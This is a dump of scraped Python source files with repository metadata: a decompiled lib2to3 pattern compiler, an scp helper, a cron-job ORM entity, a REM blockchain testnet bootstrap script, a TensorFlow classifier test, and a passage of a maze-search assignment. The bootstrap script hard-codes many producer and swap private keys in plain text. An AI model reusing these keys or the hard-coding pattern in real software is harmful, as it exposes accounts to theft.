Dataset schema (each row below is one source file, with fields in this order):

| column | type | stats |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2-616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0-69 |
| license_type | string | 2 classes |
| repo_name | string | length 5-118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4-63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k-686M, nullable |
| star_events_count | int64 | 0-209k |
| fork_events_count | int64 | 0-110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2-10.3M |
| extension | string | 246 classes |
| content | string | length 2-10.3M |
| authors | list | length 1 |
| author_id | string | length 0-212 |
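As a quick orientation, the snippet below is a minimal sketch of how a slice with this schema could be inspected, assuming the rows have been exported to a local Parquet file; the filename `stack_python_sample.parquet` is illustrative and not part of the dataset.

```python
import pandas as pd

# Hypothetical local export of the rows shown below; the filename is an assumption.
df = pd.read_parquet("stack_python_sample.parquet")

# Every row in this slice is Python source, so `language` should hold a single value.
print(df["language"].unique())

# Example filter: small, permissively licensed files, with their origin and popularity.
small = df[(df["license_type"] == "permissive") & (df["length_bytes"] < 10_000)]
print(small[["repo_name", "path", "star_events_count"]].head())
```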
1c0b41e154c867891ac764be89db7f66f1f4007f
|
2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac
|
/Python/Core/Lib/lib2to3/patcomp.py
|
77acfaaa38f990a0b1f904e5e21f839af6b589bf
|
[] |
no_license
|
FingerLeakers/DanderSpritz_docs
|
f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364
|
d96b6a71c039b329f9f81544f645857c75360e7f
|
refs/heads/master
| 2021-01-25T13:05:51.732149
| 2018-03-08T01:22:49
| 2018-03-08T01:22:49
| 123,527,268
| 2
| 0
| null | 2018-03-02T03:48:31
| 2018-03-02T03:48:30
| null |
UTF-8
|
Python
| false
| false
| 6,668
|
py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: patcomp.py
"""Pattern compiler.
The grammar is taken from PatternGrammar.txt.
The compiler compiles a pattern to a pytree.*Pattern instance.
"""
__author__ = 'Guido van Rossum <guido@python.org>'
import os
import StringIO
from .pgen2 import driver, literals, token, tokenize, parse, grammar
from . import pytree
from . import pygram
_PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), 'PatternGrammar.txt')
class PatternSyntaxError(Exception):
pass
def tokenize_wrapper(input):
"""Tokenizes a string suppressing significant whitespace."""
skip = set((token.NEWLINE, token.INDENT, token.DEDENT))
tokens = tokenize.generate_tokens(StringIO.StringIO(input).readline)
for quintuple in tokens:
type, value, start, end, line_text = quintuple
if type not in skip:
yield quintuple
class PatternCompiler(object):
def __init__(self, grammar_file=_PATTERN_GRAMMAR_FILE):
"""Initializer.
Takes an optional alternative filename for the pattern grammar.
"""
self.grammar = driver.load_grammar(grammar_file)
self.syms = pygram.Symbols(self.grammar)
self.pygrammar = pygram.python_grammar
self.pysyms = pygram.python_symbols
self.driver = driver.Driver(self.grammar, convert=pattern_convert)
def compile_pattern(self, input, debug=False, with_tree=False):
"""Compiles a pattern string to a nested pytree.*Pattern object."""
tokens = tokenize_wrapper(input)
try:
root = self.driver.parse_tokens(tokens, debug=debug)
except parse.ParseError as e:
raise PatternSyntaxError(str(e))
if with_tree:
return (self.compile_node(root), root)
else:
return self.compile_node(root)
def compile_node(self, node):
"""Compiles a node, recursively.
This is one big switch on the node type.
"""
if node.type == self.syms.Matcher:
node = node.children[0]
if node.type == self.syms.Alternatives:
alts = [ self.compile_node(ch) for ch in node.children[::2] ]
if len(alts) == 1:
return alts[0]
p = pytree.WildcardPattern([ [a] for a in alts ], min=1, max=1)
return p.optimize()
else:
if node.type == self.syms.Alternative:
units = [ self.compile_node(ch) for ch in node.children ]
if len(units) == 1:
return units[0]
p = pytree.WildcardPattern([units], min=1, max=1)
return p.optimize()
if node.type == self.syms.NegatedUnit:
pattern = self.compile_basic(node.children[1:])
p = pytree.NegatedPattern(pattern)
return p.optimize()
name = None
nodes = node.children
if len(nodes) >= 3 and nodes[1].type == token.EQUAL:
name = nodes[0].value
nodes = nodes[2:]
repeat = None
if len(nodes) >= 2 and nodes[-1].type == self.syms.Repeater:
repeat = nodes[-1]
nodes = nodes[:-1]
pattern = self.compile_basic(nodes, repeat)
if repeat is not None:
children = repeat.children
child = children[0]
if child.type == token.STAR:
min = 0
max = pytree.HUGE
elif child.type == token.PLUS:
min = 1
max = pytree.HUGE
elif child.type == token.LBRACE:
min = max = self.get_int(children[1])
if len(children) == 5:
max = self.get_int(children[3])
if min != 1 or max != 1:
pattern = pattern.optimize()
pattern = pytree.WildcardPattern([[pattern]], min=min, max=max)
if name is not None:
pattern.name = name
return pattern.optimize()
def compile_basic(self, nodes, repeat=None):
node = nodes[0]
if node.type == token.STRING:
value = unicode(literals.evalString(node.value))
return pytree.LeafPattern(_type_of_literal(value), value)
else:
if node.type == token.NAME:
value = node.value
if value.isupper():
if value not in TOKEN_MAP:
raise PatternSyntaxError('Invalid token: %r' % value)
if nodes[1:]:
raise PatternSyntaxError("Can't have details for token")
return pytree.LeafPattern(TOKEN_MAP[value])
else:
if value == 'any':
type = None
elif not value.startswith('_'):
type = getattr(self.pysyms, value, None)
if type is None:
raise PatternSyntaxError('Invalid symbol: %r' % value)
if nodes[1:]:
content = [
self.compile_node(nodes[1].children[1])]
else:
content = None
return pytree.NodePattern(type, content)
else:
if node.value == '(':
return self.compile_node(nodes[1])
if node.value == '[':
subpattern = self.compile_node(nodes[1])
return pytree.WildcardPattern([[subpattern]], min=0, max=1)
return
def get_int(self, node):
return int(node.value)
TOKEN_MAP = {'NAME': token.NAME,'STRING': token.STRING,
'NUMBER': token.NUMBER,
'TOKEN': None
}
def _type_of_literal(value):
if value[0].isalpha():
return token.NAME
else:
if value in grammar.opmap:
return grammar.opmap[value]
return None
return None
def pattern_convert(grammar, raw_node_info):
"""Converts raw node information to a Node or Leaf instance."""
type, value, context, children = raw_node_info
if children or type in grammar.number2symbol:
return pytree.Node(type, children, context=context)
else:
return pytree.Leaf(type, value, context=context)
def compile_pattern(pattern):
return PatternCompiler().compile_pattern(pattern)
|
[
"francisck@protonmail.ch"
] |
francisck@protonmail.ch
|
4c2f867eaafaafa7fe71bb3f2e8a61b7f03c0532
|
13bacb189558c8231af6bd1fd8e1dcce45c17e4d
|
/pexpect_util.py
|
c479715ddb2f49968d9d70dfbf4a01db20b7c857
|
[] |
no_license
|
zhulh200868/mycode
|
734881b963c8e57a9ff97e10bb16433fa9afb0a2
|
216a76c0aabd2c346bdfd8f4ecfbf073c1b39673
|
refs/heads/master
| 2021-01-20T19:19:02.832408
| 2016-12-31T12:08:48
| 2016-12-31T12:08:48
| 64,580,417
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
#!/usr/bin/env python
# -*- coding=utf8 -*-
import pexpect
import getpass
'''
Transfer files to a remote host via the scp command
'''
host=raw_input('hostname: ')
remote_path=raw_input('remote_path: ')
local_file=raw_input('local_file: ')
passwd=getpass.getpass('password: ')
cmd='scp -r %s %s:%s'%(local_file,host,remote_path)
child=pexpect.spawn(cmd)
child.expect('password:')
child.sendline(passwd)
child.read()
|
[
"3205777381@qq.com"
] |
3205777381@qq.com
|
c79ade31fb6a146dc68d6c36b6df30e2b5618e08
|
f7f9760261c6fb5e3998477f074e3c1f42464cf8
|
/web/src/entities/cron_job.py
|
cb8c8e1035ffb9eed2bd9fbd9b12d0a586de99bd
|
[] |
no_license
|
DrXneaky/ooredoo-docker-v3-py27
|
58c4847db994ffab0d78bd76d055a75e26d57fdf
|
b44905a764765af89ffc8ce1776b59c748a1fa01
|
refs/heads/master
| 2022-12-17T11:04:26.013406
| 2020-09-13T04:31:38
| 2020-09-13T04:31:38
| 294,741,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,834
|
py
|
from src.repositories.entity import Entity, Base
from sqlalchemy import Column, String, DateTime, Integer, ForeignKey
from marshmallow import Schema, fields
from src.commons.utils.crontab import MyCronTab # , get_last_run_from_log
class CronJob (Entity, Base):
    __tablename__ = 'cron_job'
    creationDate = Column('creation_date', DateTime)
    command = Column(String)
    jobType = Column('job_type', String)
    cronSchedule = Column('cron_schedule', String)
    expression = Column(String)
    lastRun = Column('last_run', DateTime)
    status = Column(String)
    nextRun = Column('next_run', DateTime)

    def __init__(self, creationDate, command, jobType, schedule, expression, lastRun, status, nextRun):
        self.creationDate = creationDate
        self.command = command
        self.jobType = jobType
        self.cronSchedule = schedule
        self.expression = expression
        self.lastRun = lastRun
        self.status = status
        self.nextRun = nextRun

    def job(self):
        cron = MyCronTab.MyCronTab
        job = cron.find_comment(str(id))
        return job

    def get_lastrun(self):
        job = self.job()
        last_run, status = MyCronTab.get_last_run_from_log(self)
        return last_run, status

    def update_lastrun(self, session):
        self.lastRun, self.status = self.get_lastrun()
        session.commit()

    def update_status(self, session, status):
        self.status = status
        session.commit()

class CronJobSchema(Schema):
    id = fields.Number()
    creationDate = fields.DateTime("%Y-%m-%d, %H:%M:%S")
    command = fields.Str()
    jobType = fields.Str()
    cronSchedule = fields.Str()
    expression = fields.Str()
    lastRun = fields.DateTime("%Y-%m-%d, %H:%M:%S")
    status = fields.Str()
    nextRun = fields.DateTime("%Y-%m-%d, %H:%M:%S")
|
[
"33802435+DrXneaky@users.noreply.github.com"
] |
33802435+DrXneaky@users.noreply.github.com
|
6c4df7f871bf27a393a753d9ed909f37d16a5456
|
1228576f109b6942764d338b91714a57ad58b851
|
/bootstrap/testnet_bootstrap.py
|
554197d9cd94e1464dba6fa376881276ddae15ec
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
lapolinar0519/remprotocol
|
b7ab95e97c8ecaab3bb40ae9cdc7cd6829916c4a
|
578996ce408ca0adbe6a6b895177199017ee907b
|
refs/heads/develop
| 2022-11-29T13:36:54.540719
| 2020-07-31T12:14:31
| 2020-07-31T12:14:31
| 263,375,233
| 0
| 0
|
MIT
| 2020-07-31T14:40:06
| 2020-05-12T15:24:07
|
C++
|
UTF-8
|
Python
| false
| false
| 10,359
|
py
|
import hashlib
import json
from datetime import datetime, timezone
import requests
from mainnet_bootstrap import remcli, run, intToRemCurrency, get_chain_id, wallet_port
producers_quantity = 21
producers_supply = 500_000_000_0000
swapbot_stake = 1_000_0000
MINIMUM_PRODUCER_STAKE = 200_0000
sign_digest_url = f'http://127.0.0.1:{wallet_port}/v1/wallet/sign_digest'
tech_accounts = [
#(account_name, public_key, stake, liquid)
('rewards', 'EOS8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr', 1000_0000, 100_000_000_0000),
('remfaucetbot', 'EOS8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr', 1_000_0000, 10_000_000_0000),
]
producers = {
"producers": [
{"name": "remproducer1", "pvt": "5KLGj1HGRWbk5xNmoKfrcrQHXvcVJBPdAckoiJgFftXSJjLPp7b",
"pub": "EOS8imf2TDq6FKtLZ8mvXPWcd6EF2rQwo8zKdLNzsbU9EiMSt9Lwz"},
{"name": "remproducer2", "pvt": "5K6qk1KaCYYWX86UhAfUsbMwhGPUqrqHrZEQDjs9ekP5j6LgHUu",
"pub": "EOS7Ef4kuyTbXbtSPP5Bgethvo6pbitpuEz2RMWhXb8LXxEgcR7MC"},
{"name": "remproducer3", "pvt": "5JCStvbRgUZ6hjyfUiUaxt5iU3HP6zC1kwx3W7SweaEGvs4EPfQ",
"pub": "EOS5n442Qz4yVc4LbdPCDnxNSseAiUCrNjRxAfPhUvM8tWS5svid6"},
{"name": "remproducer4", "pvt": "5JJjaKnAb9KM2vkkJDgrYXoeUEdGgWtB5WK1a38wrmKnS3KtkS6",
"pub": "EOS5y3Tm1czTCia3o3JidVKmC78J9gRQU8qHjmRjFxTyhh2vxvF5d"},
{"name": "remproducer5", "pvt": "5K7hmHA2U3nNpwGx6AffWsHyvsSMJvVKVmSgxnSYAjAvjUfzd5j",
"pub": "EOS5yR5GNn363W3cnet5PE6xWZxa2hDAhmJN5RrB1e3fmJmVNnDRJ"},
{"name": "remproduce11", "pvt": "5K3TXkZAwyJkg7TjSfopd7sTr3RXFccghXHN1nJHTzap1ZKgLdK",
"pub": "EOS76wwc1zjzRMPQnEL6rTDWLfhN2ByZd6GhDJoWBKWM6M7cUmyfS"},
{"name": "remproduce12", "pvt": "5J498VQKaFVbh2ovPrMxa5DThE1fiWWfna6H2ZofmGMaVM7bs2M",
"pub": "EOS63piLomgbAGShNu7zv3whiR52Abz8gVVMRNAqw4apJ8EQKEnQ5"},
{"name": "remproduce13", "pvt": "5JrC4vnVXroqvXtmSw3EiXcSv9agfDsKsUghzv2Rhiyrg9J36Z4",
"pub": "EOS8ZjbDEi872aLpuuAjnd76NYW6KzPaf6RBSuwXcHmKm7A1sxayV"},
{"name": "remproduce14", "pvt": "5Jx1cCRPwHM7mr8brbeS6k5GYFEDKgmz34kmfmhywToF5wqddQE",
"pub": "EOS7oiy488wfzwbR6L9QwNDQb4CHGVR5ix9udJjVyykgbLaQLgBc5"},
{"name": "remproduce15", "pvt": "5Hw5iBC7oGfR3FTwgDzHuzk4JAv24SiXq9iBbyPMb8JmKBHzjVX",
"pub": "EOS6iBVEaRDS3mofUJpa8bjD94vohHrsSqqez1wcsWjhPpeNArfBF"},
{"name": "remproduce21", "pvt": "5J3Zd6iSGcFFzRkUUqG7nKV8xifZb3sZvCnnst2WYgKqsRMvHTF",
"pub": "EOS8RpmTrNN7eEFno626tNutAKJbJ3TbMMyHi9sbmpU9t4vEYDAYM"},
{"name": "remproduce22", "pvt": "5JxWkyTDwktJVs9MNgNgmaLrRc26ESswR9gk926g47t6UCqvmop",
"pub": "EOS8jxiWA9ZHN37csWnoShEbs8tvgtYxt2UN4ZtMBXhGJRk8tQJqR"},
{"name": "remproduce23", "pvt": "5HwyQG6enrCrCZXYqrd2WsMmnreWAWUWGa9JjssodsYTSuaSA5F",
"pub": "EOS6u4zPBn1EbhNtqmSFgUhoo1ZHb1je2qUskRgk4jUe2nUfpFXLP"},
{"name": "remproduce24", "pvt": "5JyvFNY4xMHX96UFjA1sNbLTRSom5zuLSn83KYXSVu1Ex4vuY9m",
"pub": "EOS4uUK6JSXyBHNCGYEzrZzepkMSHzJsaXBAHFsieGGQ1Syzpxy11"},
{"name": "remproduce25", "pvt": "5KNe71b8F6zUszs2Mg2GPZa5cUse5i9Uy9EeH1g692aCq7KnGk9",
"pub": "EOS7iKtJ1qCgSaGfC8fquHquQYZmi43RQTkNWn68ggCTD5gUZjmYw"},
{"name": "remproduce31", "pvt": "5K61WJJWJ2ua4nz6EmgUMyAgEnRVc1MdvrHzi4PdVaPHV7R3r4M",
"pub": "EOS7KsEiRyppoaxv5yBW666b3MpDRq7FpQBttU2UUher5Ur2ke3pB"},
{"name": "remproduce32", "pvt": "5KAiF4UX7kLHeScvA7fqrSdfxKycEZ2y76uRCRD78kFpdUeq2xm",
"pub": "EOS5kiGwBZQgvY8WibiAprDbXZF1KmgEgWzwfQbAP6LFDLm5PHkyH"},
{"name": "remproduce33", "pvt": "5JwfitftPcR1eMfNuo4ZqeKYECkFCZBbPYC9zH51MK7i87packn",
"pub": "EOS66ncp9xAzdCaAggUDChFMq9YX9wfAJQmN5uMdxf8APV4ecqaZV"},
{"name": "remproduce34", "pvt": "5JyVEkLeSgioeMcw7sBLDHam4xxxDWMgaVnaBEmdWbHr9Xuo3oT",
"pub": "EOS8VPgtZmjHmPXrSmY2Mita3zevnaKDHPiiyJHTQPbf4cMdA3EiK"},
{"name": "remproduce35", "pvt": "5Jj5MMoPGp4H5bC5L6XAvDFhGGok2ghTd4mJxs9toihBYJf3oKX",
"pub": "EOS6wLPhQzGE96dMNXZxSN9GFnNtHNXY5q6CZ1BY4CizWScLvHCH6"},
{"name": "remproduce41", "pvt": "5KGWWthBagnELkrn71W4q1CtaExxasmM9X2eV8AUvjMCb1kgLHG",
"pub": "EOS7M3GEpdYZhWhKaehthCfbyQBZfHwxDbZ9ewEGysscchkHv2WCq"},
{"name": "remproduce42", "pvt": "5JEEVueiBZDXVQCTRduZnTs6hLUA29dG76p8NEQqWSZ2Fg4TkbD",
"pub": "EOS83fUneyFirnM82JT6PxgbJp5ZMxj757YJDQLFPQHKvaezRNDoX"},
{"name": "remproduce43", "pvt": "5KNMTQ3qZMH9LBjBqRMmDTi8DTGbQYYbJv1p5a58nGcYqDzaRJ5",
"pub": "EOS7rGbRupx3EkQo7dTcE9Ryx6XnEeNSEHwFABveDGtN7wUK4Xn9Q"},
{"name": "remproduce44", "pvt": "5K5KAPehBnqQD3sRryjXWfTYaPDfmMfAAYauNk49tSf2gXfCEQo",
"pub": "EOS7Xk7EhYdvWds1qkfdiTaaXYJyupJRm9Ufj5dba6QiYPqQT57hU"},
{"name": "remproduce45", "pvt": "5Jo3yZyJJwaoGzSRVi6PimiuxA3HE48Tyti7X1BmQrtt3dx2szH",
"pub": "EOS8erdpbAGK1Xbuz2zdxTY7Km2wHZfL6znXn1ijFJLPn1AR2ZzZx"},
{"name": "remproduce51", "pvt": "5JsP33C6e9edyFC6QWp361Q9ZVNKWKSznQ6198PkP1c8FpjQcdx",
"pub": "EOS64UfKJXespdvq4uYtN4rKEuSMuqRXq6rXaNkH8VCXP7iE1Bjdg"},
{"name": "remproduce52", "pvt": "5JDuKWcJFiwtogspSusdqcHWsHKEn5HydApKL58GaVNdnvQh1m1",
"pub": "EOS7DUtP3y2yqeabTYavbuFvA5yfSLM1fg7t3JVRr4dMuEJ4GZWZS"},
{"name": "remproduce53", "pvt": "5KD3hRFXkMYYUurVC3myJo9FRmT9d9XidyNXYSVTKtQ4wegh4Uw",
"pub": "EOS6K1vpE6XAX39kKAu2tBD6jJ8XpQzjWhC3X92duyQNBvdrk2zmr"},
{"name": "remproduce54", "pvt": "5JYamJxxJiB8aJhn4W5G5XUxzBd8HRNWoQop7SLNhgnf6LAiquF",
"pub": "EOS7ogfqTFzUe97Rr6taa3SmqrqQJujMmjMHgZ72TfPZFXqVWPjSa"},
{"name": "remproduce55", "pvt": "5KZFvhuNuU3es7hEoAorppkhfCuAfqBGGtzqvesArmzwVwJf64B",
"pub": "EOS69tWc1VS6aP2P1D8ryzTiakPAYbV3whbHeWUzfD8QWYuHKqQxk"}
]
}
def geometric_progression():
prod_supply_sum = 0
prod_supply = producers_supply // 2
for prod in producers['producers']:
prod['funds'] = max(prod_supply, MINIMUM_PRODUCER_STAKE)
prod_supply_sum += prod['funds']
prod_supply = prod_supply // 2
return prod_supply_sum
def algebraic_progression():
prod_stake_delta = 1_000_000_0000 # delta for arithmetic progression
prod_supply = producers_supply / producers_quantity + prod_stake_delta * (producers_quantity - 1) / 2
prod_supply_sum = 0
for prod in producers['producers']:
prod['funds'] = max(prod_supply, MINIMUM_PRODUCER_STAKE)
prod_supply_sum += prod['funds']
prod_supply = prod_supply - prod_stake_delta
return prod_supply_sum
initial_supply = geometric_progression() + swapbot_stake
for _, _, s, l in tech_accounts:
initial_supply += s + l
swap_pubkey = 'EOS8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr'
swap_privkey = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
def create_tech_accounts():
for account_name, public_key, stake, liquid in tech_accounts:
run(remcli + f' system newaccount rem {account_name} {public_key} {public_key} \
--stake "{intToRemCurrency(stake)}" --transfer -p rem@active')
def init_supply_to_rem_acc():
timestamp = datetime.today().strftime("%Y-%m-%dT%H:%M:%S")
epoch = datetime.utcfromtimestamp(0)
block_datetime_utc = datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc).timestamp()
epoch_datetime_utc = datetime.utcfromtimestamp(0).replace(tzinfo=timezone.utc).timestamp()
seconds_since_epoch = str(int(block_datetime_utc - epoch_datetime_utc))
txid = '0x0000000000000000000000000000000000000000000000000000000000000000'
return_address = '0x0000000000000000000000000000000000000000'
chain_id = get_chain_id()
return_chainid = 'eth'
rampayer = 'rem'
receiver = 'rem'
digest_to_sign = f'{receiver}*{txid}*{chain_id}*{intToRemCurrency(initial_supply)}*\
{return_address}*{return_chainid}*{seconds_since_epoch}'.encode()
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.post(sign_digest_url, headers=headers,
data=json.dumps([hashlib.sha256(digest_to_sign).hexdigest(), swap_pubkey]))
sig = response.json()
run(remcli + f' push action rem.swap init \'["{rampayer}",\
"{txid}", "{swap_pubkey}",\
"{intToRemCurrency(initial_supply)}", "{return_address}", "{return_chainid}", "{timestamp}"]\'\
-p rem@active')
run(remcli + f' push action rem.swap finish \'["{rampayer}", "{receiver}",\
"{txid}",\
"{swap_pubkey}", "{intToRemCurrency(initial_supply)}", "{return_address}", "{return_chainid}",\
"{timestamp}", "{sig}"]\'\
-p rem@active')
def issue_supply_to_rem_acc():
run(remcli + f' push action rem.token issue \'["rem.swap",\
"{intToRemCurrency(initial_supply)}", "initial supply"]\' -p rem.swap -p rem ')
run(remcli + f' push action rem.token transfer \'["rem.swap", "rem",\
"{intToRemCurrency(initial_supply)}", "initial supply"]\' -p rem.swap -p rem ')
def create_producer_accounts():
for prod in producers['producers']:
run(remcli + f' system newaccount rem {prod["name"]} {prod["pub"]} {prod["pub"]} \
--stake "{intToRemCurrency(prod["funds"])}" --transfer -p rem@active')
def import_producer_keys():
for prod in producers['producers']:
run(remcli + 'wallet import --private-key ' + prod['pvt'])
def transfer_tokens_to_accounts():
for account_name, public_key, stake, liquid in tech_accounts:
run(remcli + f' transfer rem {account_name} "{intToRemCurrency(liquid)}" ""')
run(remcli + f' transfer rem swapbot "{intToRemCurrency(swapbot_stake)}" ""')
def stake_tokens():
run(remcli + f' system delegatebw swapbot swapbot \
"{intToRemCurrency(swapbot_stake)}" -p swapbot@active')
def reg_producers():
for prod in producers['producers']:
run(remcli + f' system regproducer {prod["name"]} {prod["pub"]} "" \
-p {prod["name"]}@active')
def vote_producers():
for prod in producers['producers']:
run(remcli + f' system voteproducer prods {prod["name"]} {prod["name"]} \
-p {prod["name"]}@active')
if __name__ == '__main__':
issue_supply_to_rem_acc()
create_tech_accounts()
create_producer_accounts()
import_producer_keys()
transfer_tokens_to_accounts()
stake_tokens()
reg_producers()
vote_producers()
|
[
"asaprykin17@gmail.com"
] |
asaprykin17@gmail.com
|
c55eedddca6ca6cb46267e480fe8f50a28fa5212
|
79934c18d18838dd46c563baf85f148221a5b89d
|
/training_code/input_detector/test.py
|
c444deec95e2705e818596dd772f0558fe9525c8
|
[] |
no_license
|
DungLuongTuan/Music-chat
|
0068808965ea1ac7496566bbc09195fc39e899b9
|
d66551c2fe0a7596b533c21346e22ee7b58c70a1
|
refs/heads/master
| 2021-05-07T08:03:55.852750
| 2017-12-10T17:08:02
| 2017-12-10T17:08:02
| 109,251,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,556
|
py
|
import numpy as np
import tensorflow as tf
import fasttext as ft
from os import listdir
labels = ['bot-information', 'music-domain', 'unknown']
def transform(sentence, max_step):
    output = []
    word2vec = ft.load_model('../../model/word2vec/vi.bin')
    sentence_splited = sentence.split(' ')
    for word in sentence_splited:
        output.append(word2vec[word])
    while (len(output) < max_step):
        output.append(np.zeros(100))
    return [output], [len(sentence_splited)]

def main():
    ### model
    max_step = 100
    n_hidden = 100
    ### enter text
    text = 'tên gì ?'
    data, seqlen = transform(text, max_step)
    print(np.shape(data))
    ### build graph
    x = tf.placeholder(tf.float32, [None, max_step, 100])
    sequence_length = tf.placeholder(tf.int32, [None])
    w = tf.get_variable(name = 'w', shape = [n_hidden, 3])
    b = tf.get_variable(name = 'b', shape = [1, 3])
    ### LSTM layer
    lstm_cell = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
    output, _ = tf.nn.dynamic_rnn(cell = lstm_cell, inputs = x, dtype = tf.float32)
    current_batch_size = tf.shape(output)[0]
    index = tf.range(0, current_batch_size)*max_step + (sequence_length - 1)
    output_last = tf.gather(tf.reshape(output, [-1, n_hidden]), index)
    pred = tf.nn.softmax(tf.matmul(output_last, w) + b)
    sess = tf.InteractiveSession()
    tf.global_variables_initializer().run()
    saver = tf.train.Saver()
    saver.restore(sess, '../../model/input_detector/model.ckpt')
    prediction = sess.run(pred, feed_dict = {x: data, sequence_length: seqlen})
    print(labels[np.argmax(prediction)])

if __name__ == '__main__':
    main()
|
[
"tuanluong04011996@gmail.com"
] |
tuanluong04011996@gmail.com
|
e9a9edf90d3078fe77db28b65ad04bb9638c84c9
|
12508b40fed2526d9c6fef991701cea0581084d8
|
/mp1/search_without_class
|
24c3d3d568af415c17eec50f3b45e001dbeafec6
|
[] |
no_license
|
AlexSunNik/cs440
|
e30283f33b82ea64266375addb649d4f0ad26390
|
6fac70be7298385c9f7b9824427b25d1476cdb27
|
refs/heads/master
| 2022-05-27T01:28:42.881079
| 2020-05-03T01:44:20
| 2020-05-03T01:44:20
| 237,539,945
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,331
|
# search.py
# ---------------
# Licensing Information: You are free to use or extend this projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to the University of Illinois at Urbana-Champaign
#
# Created by Michael Abir (abir2@illinois.edu) on 08/28/2018
"""
This is the main entry point for MP1. You should only modify code
within this file -- the unrevised staff files will be used for all other
files and classes when code is run, so be careful to not modify anything else.
"""
# Search should return the path.
# The path should be a list of tuples in the form (row, col) that correspond
# to the positions of the path taken by your search algorithm.
# maze is a Maze object based on the maze from the file specified by input filename
# searchMethod is the search method specified by --method flag (bfs,dfs,astar,astar_multi,extra)
import sys
from queue import PriorityQueue
import heapq
from copy import deepcopy
def search(maze, searchMethod):
return {
"bfs": bfs,
"astar": astar,
"astar_corner": astar_corner,
"astar_multi": astar_multi,
"extra": extra,
}.get(searchMethod)(maze)
def bfs(maze):
"""
Runs BFS for part 1 of the assignment.
@param maze: The maze to execute the search on.
@return path: a list of tuples containing the coordinates of each state in the computed path
"""
#Find a single point
objs = maze.getObjectives()
start = maze.getStart()
total_path = []
for obj in objs:
queue = []
visited = {}
queue.append(start)
visited[start] = None
while len(queue) != 0:
curPt = queue.pop(0)
if curPt == obj:
path = []
while curPt is not None:
path.insert(0, curPt)
curPt = visited[curPt]
break
for p in maze.getNeighbors(curPt[0], curPt[1]): # See neighbors
if p not in visited and not maze.isWall(curPt[0], curPt[1]):
queue.append(p)
# Unlike dijkstra, which considered as visited when expanded
visited[p] = curPt
total_path += path
start = obj
return total_path
def Heu_Manhatten(curNode, dest):
# Return the manhatten distance
return abs(curNode[0] - dest[0]) + abs(curNode[1] - dest[1])
def astar(maze):
"""
Runs A star for part 1 of the assignment.
@param maze: The maze to execute the search on.
@return path: a list of tuples containing the coordinates of each state in the computed path
"""
# TODO: Write your code here
dest = maze.getObjectives()[0]
frontier = {} # Pair: node : [g_val, f_val]
prev = {} # Explored dict
start = maze.getStart()
visited = {} # Explored
frontier[start] = [0, Heu_Manhatten(start, dest)]
prev[start] = None
while len(frontier) != 0:
#Get min f_val pair
min_pair = min(frontier.items(), key=lambda x: x[1][1]) # Get by f_val
curNode = min_pair[0]
del frontier[curNode]
visited[curNode] = min_pair[1]
if maze.isObjective(curNode[0], curNode[1]):
path = []
while curNode is not None:
path.insert(0, curNode)
curNode = prev[curNode]
return path
for node in maze.getNeighbors(curNode[0], curNode[1]):
new_g = min_pair[1][0] + 1
if node in visited:
continue
if new_g < frontier.get(node, [sys.maxsize, sys.maxsize])[1]:
frontier[node] = [new_g, new_g + Heu_Manhatten(node, dest)]
prev[node] = curNode
return []
def Heu_Corner(curNode, objs):
#The function calculates the heuristic function for
#the four-corners problem
#It uses the sum of the Manhatten distance
if len(objs) == 0:
return 0
unvisited = list(objs[:]) # Perform a deep copy
start = curNode
heu = 0
while len(unvisited) != 0:
nearest_corner = min(unvisited, key=lambda x: Heu_Manhatten(start, x))
heu += Heu_Manhatten(start, nearest_corner)
start = nearest_corner
unvisited.remove(nearest_corner)
return heu
def astar_corner(maze):
frontier = []
visited = []
prev = {}
objs = tuple(maze.getObjectives())
start = maze.getStart()
f_init = Heu_Corner(start, objs)
initState = (start, objs, 0)
heapq.heappush(frontier, (f_init, initState))
prev[initState] = None
while True:
cur_state = heapq.heappop(frontier)[1]
cur_node = cur_state[0]
cur_objs = cur_state[1]
cur_g = cur_state[2]
if len(list(cur_objs)) == 0:
path = []
ite = cur_state
while ite is not None:
path.insert(0, ite[0])
ite = prev[ite]
return path
visited.append(cur_state)
for node in maze.getNeighbors(cur_node[0],cur_node[1]):
new_g = cur_g + 1
new_objs = cur_objs[:]
if node in cur_objs:
listx = list(new_objs)
listx.remove(node)
new_objs = tuple(listx)
reached_state = (node, new_objs, new_g)
new_f = new_g + Heu_Corner(node, new_objs)
flag = 0
for i in range(len(frontier)):
to_state = frontier[i][1]
if to_state[0] == node and to_state[1] == new_objs:
if new_g < to_state[2]:
frontier[i] = (new_f, reached_state)
prev[reached_state] = cur_state
